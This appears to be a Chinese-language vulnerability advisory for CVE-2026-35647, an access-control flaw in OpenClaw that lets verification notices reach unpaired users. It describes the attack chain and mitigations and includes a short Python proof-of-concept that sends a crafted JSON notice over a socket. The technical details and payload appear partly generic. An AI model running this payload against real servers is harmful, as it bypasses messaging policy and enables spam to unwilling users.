CVE-2026-35647 CVSS 5.3 中危

CVE-2026-35647 OpenClaw访问控制绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35647

漏洞类型

访问控制绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.25之前的版本包含一个访问控制漏洞。该漏洞源于验证通知处理逻辑未能正确执行直接消息（DM）策略检查，导致消息可以发送给未配对的用户。攻击者无需身份验证即可利用此漏洞，绕过现有的安全策略，向本不应接收消息的用户发送验证通知。此问题可能会被滥用进行垃圾信息传播或绕过通信限制，影响系统的完整性。

技术细节

该漏洞位于OpenClaw的消息处理模块中，具体表现为验证通知发送时缺乏对目标用户关系的校验。在正常流程中，系统应检查发送者与接收者是否已配对或符合DM策略。然而，受影响版本的代码在处理特定类型的验证通知时，跳过了`check_dm_policy`或类似的权限验证函数。攻击者无需用户交互（UI:N）且无需认证（PR:N），可以通过网络向任意目标用户ID发送构造好的恶意验证通知。虽然该漏洞不直接导致数据泄露或远程代码执行，但它破坏了通信的完整性（I:L），允许未经授权的消息传递。官方修复补丁已在GitHub提交，主要是在消息发送前增加了严格的对等关系验证。

攻击链分析

STEP 1

1. 信息收集

攻击者识别网络上运行OpenClaw 2026.3.25之前版本的目标实例。

STEP 2

2. 漏洞利用

攻击者向目标服务器发送特制的验证通知数据包，目标用户为未配对的对等方。

STEP 3

3. 策略绕过

由于服务器未进行DM策略检查，成功接收并处理该消息。

STEP 4

4. 影响达成

未授权用户接收到验证通知，系统的消息完整性受到破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import json

# PoC for CVE-2026-35647: OpenClaw Verification Notice Bypass
# This script simulates sending a verification notice to an unpaired peer.

def send_verification_notice(target_ip, target_port, victim_user_id):
    try:
        # Establish connection to the OpenClaw service
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))

        # Craft payload mimicking a verification notice
        # The vulnerability lies in the 'type' field triggering a bypass
        payload = {
            "action": "send_message",
            "type": "verification_notice", 
            "recipient": victim_user_id,
            "content": "Bypassed DM Policy Check"
        }
        
        # Send payload
        message = json.dumps(payload).encode('utf-8')
        s.sendall(message)
        print(f"[+] Verification notice sent to {victim_user_id} bypassing DM policy.")
        
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example usage
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 8080
    VICTIM_ID = "unpaired_user_123"
    send_verification_notice(TARGET_HOST, TARGET_PORT, VICTIM_ID)

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界限制对OpenClaw服务的访问，仅允许受信任的IP地址连接，或在应用层暂时禁用验证通知功能，直到应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表